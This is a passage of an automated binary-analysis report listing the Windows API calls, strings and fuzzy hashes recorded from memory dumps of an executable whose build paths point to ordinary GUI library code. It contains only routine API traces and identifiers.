                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Increment$Decrement
                                                                                                • String ID: xMS$xMS
                                                                                                • API String ID: 4289621856-1285152028
                                                                                                • Opcode ID: da2cda8a96916393a5b723a8798960a4d412dcafdc144db7c98076f900dc241c
                                                                                                • Instruction ID: bd9cec4fdc9f052810bc6e1f96715c7e80886e114919f452b8eef8c496ae6948
                                                                                                • Opcode Fuzzy Hash: da2cda8a96916393a5b723a8798960a4d412dcafdc144db7c98076f900dc241c
                                                                                                • Instruction Fuzzy Hash: 5641E271A00705AFD710DF95CC45BAFBBB8FF44704F1085ADE809A7282E7B96904CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00488106
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00488125
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalDecrementInterlockedSectionValue$EnterException@8LeaveThrow
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\resourceinfo.cpp$xMS$xMS$TS
                                                                                                • API String ID: 2345687290-3546421520
                                                                                                • Opcode ID: 3e08a9417c75f90ad84a1145ea31b1ca324a51da854123a54d5abd54cdcf35ed
                                                                                                • Instruction ID: 6ca77c2aa9151e2b0a91f298311545f83f909902e1c8c2ee3b9192abb83cee85
                                                                                                • Opcode Fuzzy Hash: 3e08a9417c75f90ad84a1145ea31b1ca324a51da854123a54d5abd54cdcf35ed
                                                                                                • Instruction Fuzzy Hash: CE315531600A10ABD721EF298C42B6F7715EB00734F508A1EF965673C1EF38AD128399
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetMessagePos.USER32 ref: 004600AD
                                                                                                  • Part of subcall function 00447FA0: IsWindow.USER32(?), ref: 00447FB6
                                                                                                  • Part of subcall function 00447FA0: ScreenToClient.USER32 ref: 00447FE6
                                                                                                  • Part of subcall function 00447FA0: GetLastError.KERNEL32 ref: 00447FF0
                                                                                                • IsWindow.USER32(?), ref: 004600EA
                                                                                                • SendMessageW.USER32(?,00000445,00000000,?), ref: 00460123
                                                                                                • IsWindow.USER32(?), ref: 00460137
                                                                                                • SendMessageW.USER32(?,00000418,00000000,00000000), ref: 0046016D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageWindow$Send$ClientErrorLastScreen
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h
                                                                                                • API String ID: 2329287743-3237162522
                                                                                                • Opcode ID: 51975ca5e42acabce09158f099272995619303f56d45802a65c4239217c123b8
                                                                                                • Instruction ID: 0ebe13888bfb4fa241ae7eb69721bf7e443d81b75de7a05033e0df48abe40c92
                                                                                                • Opcode Fuzzy Hash: 51975ca5e42acabce09158f099272995619303f56d45802a65c4239217c123b8
                                                                                                • Instruction Fuzzy Hash: 5231CF717447056BE620EF289D02B7BB6E8ABD0715F00462FF994E72C1FBB5D810869A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • BitBlt.GDI32(?,?,?,?,?,?,00000000,?,00CC0020), ref: 0044B47A
                                                                                                • SelectObject.GDI32(?,00000000), ref: 0044B49E
                                                                                                • DeleteDC.GDI32(?), ref: 0044B4B7
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValue$DeleteEnterException@8LeaveObjectSelectThrow
                                                                                                • String ID: @fO$@fO$@fO$@fO$d:\build\teamagent\_work\1\s\0\awl\src\gdiglobalsawl.cpp
                                                                                                • API String ID: 3566311084-770875366
                                                                                                • Opcode ID: f1afa0fc04241319ceaa0198371633a3a7c075bce37b532555b521a16db1be03
                                                                                                • Instruction ID: 43de152c0d151e3cc7752f2d400aebdc8273dd0e76f98575a54c68c672267ba9
                                                                                                • Opcode Fuzzy Hash: f1afa0fc04241319ceaa0198371633a3a7c075bce37b532555b521a16db1be03
                                                                                                • Instruction Fuzzy Hash: 7E316C71A40309ABEB209F59DD43FAF7B75EB44B04F10811AFD10A62C2D7B9D9208B99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • TlsGetValue.KERNEL32(?,00530274,?,0047B5AC,?,00000000,74E070F0,004E41C6,000000FF), ref: 0047B305
                                                                                                • TlsSetValue.KERNEL32(0053011C,?,0047B5AC,?,00000000,74E070F0,004E41C6,000000FF), ref: 0047B323
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0047B335
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0047B385
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 0047B3A5
                                                                                                • TlsSetValue.KERNEL32(0053011C), ref: 0047B3CB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: InterlockedValue$Decrement$Increment
                                                                                                • String ID: xMS$xMS
                                                                                                • API String ID: 921170178-1285152028
                                                                                                • Opcode ID: 87af95c90a7c4d0f36e817e6816931d2f67e99f86c42ff01fbfa21871f292a2c
                                                                                                • Instruction ID: 4e974c41edc558f7be0e6e20eafa790e15107c9ff754b0d3852605962c102dfc
                                                                                                • Opcode Fuzzy Hash: 87af95c90a7c4d0f36e817e6816931d2f67e99f86c42ff01fbfa21871f292a2c
                                                                                                • Instruction Fuzzy Hash: AC31AE35901644EBCB119FA8CD09BEFBFB8EF45710F14859AE80167392C7755A10CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsMenu.USER32 ref: 00434381
                                                                                                • IsMenu.USER32 ref: 004343E3
                                                                                                • GetMenuItemCount.USER32 ref: 004343AD
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 00434410
                                                                                                  • Part of subcall function 0046C890: InterlockedDecrement.KERNEL32(?), ref: 0046CA18
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(00000000), ref: 0046CA51
                                                                                                Strings
                                                                                                • D:\Build.Agent\TeamAgent\_work\1\s\Build\0\AWL\Inc\MenuAwl.h, xrefs: 00434391
                                                                                                • @fO, xrefs: 004343FD
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\menuawl.h, xrefs: 004343F3
                                                                                                • @fO, xrefs: 0043439B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Menu$Value$CriticalItemSection$CountDecrementEnterException@8InterlockedLeaveThrow
                                                                                                • String ID: @fO$@fO$D:\Build.Agent\TeamAgent\_work\1\s\Build\0\AWL\Inc\MenuAwl.h$d:\build\teamagent\_work\1\s\0\awl\inc\menuawl.h
                                                                                                • API String ID: 1928934770-2894188480
                                                                                                • Opcode ID: 1005e2bf7974da67af79a5cb77faaa1adfe86e29128e39f0cac0b006ae8bd1ff
                                                                                                • Instruction ID: 1158d97e828f82e8ffd10fceb204fd96b7092d95d604358d4bf01855a3adffde
                                                                                                • Opcode Fuzzy Hash: 1005e2bf7974da67af79a5cb77faaa1adfe86e29128e39f0cac0b006ae8bd1ff
                                                                                                • Instruction Fuzzy Hash: BE112B3274021867E7202F656D06AB7F659FBD8316F04513BFE09C2692FF6ADC21819D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 00463438
                                                                                                • IsWindow.USER32(?), ref: 00463493
                                                                                                • SendMessageW.USER32(?,00000418,00000000,00000000), ref: 004634C9
                                                                                                • SendMessageW.USER32(?,0000041D,00000084,?), ref: 004634FD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow
                                                                                                • String ID: @fO$@fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h
                                                                                                • API String ID: 701072176-2168440668
                                                                                                • Opcode ID: 82a7993c8776356bc01435ff50779c5dca321d14d09aca2ff0b2f178146d5d5a
                                                                                                • Instruction ID: e39b9a5ac6a35d5a5f886e547bc9e2f650b0ba0a4d2ab4581c9b106497443357
                                                                                                • Opcode Fuzzy Hash: 82a7993c8776356bc01435ff50779c5dca321d14d09aca2ff0b2f178146d5d5a
                                                                                                • Instruction Fuzzy Hash: 3821AE7078070437F3215F259C4BF37B658AB50B06F10852EBA55EA2C1EFF9E910869D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 00467269
                                                                                                • IsWindow.USER32(?), ref: 004672D3
                                                                                                • GetWindowLongW.USER32(00000001,000000EC), ref: 00467303
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$Long
                                                                                                • String ID: @fO$@fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl$d:\build\teamagent\_work\1\s\0\awl\src\popuptoolbarawl.cpp
                                                                                                • API String ID: 847901565-2504024974
                                                                                                • Opcode ID: e68e17de5f1cd4ba7ecc2ded8764cee20a9af4cd967b7c6d7be8b85accc3b90a
                                                                                                • Instruction ID: 0425a1dd70c5001b030d8ac1723127b75d8f92216116d1aa3f7adfa481006214
                                                                                                • Opcode Fuzzy Hash: e68e17de5f1cd4ba7ecc2ded8764cee20a9af4cd967b7c6d7be8b85accc3b90a
                                                                                                • Instruction Fuzzy Hash: 62110D31B447102BE7306B399C07F3B36A89B80B05F10412FB955DB2C2FAB8E800869E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • ClientToScreen.USER32(?,?), ref: 004310F0
                                                                                                • ChildWindowFromPointEx.USER32(?,?,?,00000003), ref: 00431107
                                                                                                • ScreenToClient.USER32 ref: 00431127
                                                                                                • ChildWindowFromPointEx.USER32(00000000,?,?,00000003), ref: 00431134
                                                                                                • ScreenToClient.USER32 ref: 0043115C
                                                                                                • ChildWindowFromPointEx.USER32(00000000,?,?,00000003), ref: 00431169
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • @fO, xrefs: 004310CD
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\windowawl.cpp, xrefs: 004310C3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ChildClientFromPointScreenWindow$CriticalSectionValue$EnterException@8LeaveThrow
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\src\windowawl.cpp
                                                                                                • API String ID: 2642098206-1732439790
                                                                                                • Opcode ID: 2d64e7265aff43ecfd2967e6fc3b9bb5d502233af5ef963043822ca994352323
                                                                                                • Instruction ID: eae58c2ac89a51ba7e9b0b6694aaf422599b899bfdc9d96463a4492982de294e
                                                                                                • Opcode Fuzzy Hash: 2d64e7265aff43ecfd2967e6fc3b9bb5d502233af5ef963043822ca994352323
                                                                                                • Instruction Fuzzy Hash: B2213072505311ABC311DF19DC41DAFBBE8FB8C754F050A1EF988A7350D765DA048B96
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32 ref: 004A116F
                                                                                                • TlsGetValue.KERNEL32 ref: 004A1186
                                                                                                • TlsSetValue.KERNEL32(0053011C), ref: 004A11A4
                                                                                                  • Part of subcall function 004B9C30: InterlockedIncrement.KERNEL32 ref: 004B9C69
                                                                                                  • Part of subcall function 004B9C30: InterlockedDecrement.KERNEL32(?), ref: 004B9CEB
                                                                                                  • Part of subcall function 004B9C30: RegCloseKey.ADVAPI32(00000000,?,?), ref: 004B9D2F
                                                                                                  • Part of subcall function 004B9C30: SetLastError.KERNEL32(00000000), ref: 004B9D36
                                                                                                  • Part of subcall function 004B9C30: InterlockedDecrement.KERNEL32(00530380), ref: 004B9D40
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004A11D8
                                                                                                • TlsSetValue.KERNEL32(0053011C), ref: 004A11FB
                                                                                                • LeaveCriticalSection.KERNEL32(00534C78), ref: 004A120D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$DecrementValue$CriticalSection$CloseEnterErrorIncrementLastLeave
                                                                                                • String ID: xLS$xMS
                                                                                                • API String ID: 3660905600-2277838521
                                                                                                • Opcode ID: 8bd794a9187e5278b89ecac4ecf65a1380f74c30df805da72056086e6efbb044
                                                                                                • Instruction ID: 2400ec599a20d9b00de0382fd40647c154b1dc2c0674c666ca005b86bedc0f04
                                                                                                • Opcode Fuzzy Hash: 8bd794a9187e5278b89ecac4ecf65a1380f74c30df805da72056086e6efbb044
                                                                                                • Instruction Fuzzy Hash: D521C131505289EFC701DFA8DD08B9EBFF9BB56714F204159F804A7392C7B46A10CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00534D20), ref: 004722B0
                                                                                                • EnterCriticalSection.KERNEL32(00534CF0), ref: 004722CD
                                                                                                • LeaveCriticalSection.KERNEL32(00534CF0), ref: 004722F0
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00472322
                                                                                                • LeaveCriticalSection.KERNEL32(00534D20), ref: 00472338
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$Value$Exception@8IncrementInterlockedThrow
                                                                                                • String ID: MS$@fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\fineobjects.cpp
                                                                                                • API String ID: 1446932630-3653881315
                                                                                                • Opcode ID: 0295e24986c41868ef3b9fcea194c4a2724bd94897b05c30f0cd660bafc759da
                                                                                                • Instruction ID: 49e9ac100c7b4b3fb42f1c557f09addbf8ef7f1af85409ba917fe30eca2bbf54
                                                                                                • Opcode Fuzzy Hash: 0295e24986c41868ef3b9fcea194c4a2724bd94897b05c30f0cd660bafc759da
                                                                                                • Instruction Fuzzy Hash: 8021C331944398DBDB11CBADAD057AEBFF4BB15709F14009AE944A73C2C3F91A04CBA6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00534D20), ref: 004723A0
                                                                                                • EnterCriticalSection.KERNEL32(00534CF0), ref: 004723BD
                                                                                                • LeaveCriticalSection.KERNEL32(00534CF0), ref: 004723E0
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00472412
                                                                                                • LeaveCriticalSection.KERNEL32(00534D20), ref: 00472428
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$Value$Exception@8IncrementInterlockedThrow
                                                                                                • String ID: MS$@fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\fineobjects.cpp
                                                                                                • API String ID: 1446932630-3653881315
                                                                                                • Opcode ID: b9885ba1f22acecb0f2585089ee9711f1d4916f4463f6eeb55380de3aed61025
                                                                                                • Instruction ID: 2dcd44bee6a4e04052c7a569686c4be903399b61d89dea136fe049bf7ad61190
                                                                                                • Opcode Fuzzy Hash: b9885ba1f22acecb0f2585089ee9711f1d4916f4463f6eeb55380de3aed61025
                                                                                                • Instruction Fuzzy Hash: 8521C3319443989BDB11CBADAD057AEBFF4BB15709F14009AE944A7382C3F91A44CBA6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00534D20), ref: 00472490
                                                                                                • EnterCriticalSection.KERNEL32(00534CF0), ref: 004724AD
                                                                                                • LeaveCriticalSection.KERNEL32(00534CF0), ref: 004724D0
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00472502
                                                                                                • LeaveCriticalSection.KERNEL32(00534D20), ref: 00472518
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$Value$Exception@8IncrementInterlockedThrow
                                                                                                • String ID: MS$@fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\fineobjects.cpp
                                                                                                • API String ID: 1446932630-3653881315
                                                                                                • Opcode ID: b0181311101facfdb8f890cd407ce26cb64039005369a35c75867e0eeae59a0f
                                                                                                • Instruction ID: b5b2e699e7b510e3e41b63f57ce78b48ef307ac809cb66c467e8d4d8f99a3787
                                                                                                • Opcode Fuzzy Hash: b0181311101facfdb8f890cd407ce26cb64039005369a35c75867e0eeae59a0f
                                                                                                • Instruction Fuzzy Hash: 0921F3319443989BDB11CBACAD057AEBFF4BB15709F14009AE904A7382C3F91A04CBA6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsMenu.USER32 ref: 0042F24D
                                                                                                • GetMenuItemInfoW.USER32(0CC25DE5,?,00000001,B), ref: 0042F281
                                                                                                • GetLastError.KERNEL32(?,0042E5E3,00000000,00000030), ref: 0042F28B
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                  • Part of subcall function 00439430: GetCurrentProcess.KERNEL32(00000000,00000000,00502800,?,?,?,0043F3D3,?), ref: 00439460
                                                                                                  • Part of subcall function 00439430: TerminateProcess.KERNEL32(00000000,?,?,?,0043F3D3,?), ref: 00439467
                                                                                                  • Part of subcall function 00439430: InterlockedDecrement.KERNEL32(?), ref: 004394BA
                                                                                                  • Part of subcall function 00439430: GetCurrentProcess.KERNEL32(00000000), ref: 004394E5
                                                                                                  • Part of subcall function 00439430: TerminateProcess.KERNEL32(00000000), ref: 004394EC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
